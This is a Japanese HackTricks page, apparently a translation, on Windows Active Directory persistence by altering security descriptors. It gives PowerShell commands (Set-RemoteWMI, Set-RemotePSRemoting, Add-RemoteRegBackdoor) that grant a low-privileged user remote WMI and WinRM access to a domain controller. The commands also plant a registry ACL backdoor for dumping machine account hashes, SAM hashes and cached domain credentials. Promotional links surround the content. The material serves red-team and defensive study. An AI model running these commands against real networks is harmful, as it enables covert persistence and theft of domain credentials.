6 KiB
セキュリティ記述子
htARTE(HackTricks AWS Red Team Expert) でゼロからヒーローまでAWSハッキングを学ぶ!
HackTricks をサポートする他の方法:
- HackTricks で企業を宣伝したい場合や HackTricks をPDFでダウンロードしたい場合は、SUBSCRIPTION PLANS をチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- The PEASS Familyを発見し、独占的なNFTsコレクションをご覧ください
- 💬 Discordグループやtelegramグループに参加するか、Twitter 🐦 @carlospolopmでフォロー**してください。
- ハッキングテクニックを共有するには、 HackTricks と HackTricks Cloud のGitHubリポジトリにPRを提出してください。
セキュリティ記述子
ドキュメントから: セキュリティ記述子定義言語(SDDL)は、セキュリティ記述子を記述するために使用される形式を定義します。SDDL は DACL と SACL に ACE 文字列を使用します: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;
セキュリティ記述子は、オブジェクトがオブジェクトに対して持つ権限を格納するために使用されます。オブジェクトの セキュリティ記述子をわずかに変更するだけで、特権グループのメンバーである必要がなく、そのオブジェクトに対して非常に興味深い権限を取得できます。
この永続化テクニックは、通常管理者権限が必要なタスクを実行できるようにするために、特定のオブジェクトに対して必要なすべての特権を獲得する能力に基づいています。
WMI へのアクセス
ユーザーに リモートで WMI を実行する権限を与えることができます こちらを使用して:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
WinRMへのアクセス
[こちらを使用して](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)、ユーザーにwinrm PSコンソールへのアクセス**を許可します。
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
ハッシュへのリモートアクセス
レジストリにアクセスし、ダンプハッシュを作成してDAMP****を使用してRegバックドアを作成します。これにより、コンピュータのハッシュ、SAM、およびコンピュータ内のキャッシュされたAD資格情報をいつでも取得できます。したがって、これをドメインコントローラーコンピュータに対して通常のユーザーに許可すると非常に便利です。
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
Silver Ticketsをチェックして、ドメインコントローラーのコンピューターアカウントのハッシュを使用する方法を学ぶことができます。
htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学ぶ!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- The PEASS Familyを発見し、独占的なNFTのコレクションを見つける
- 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmでフォローする。
- HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。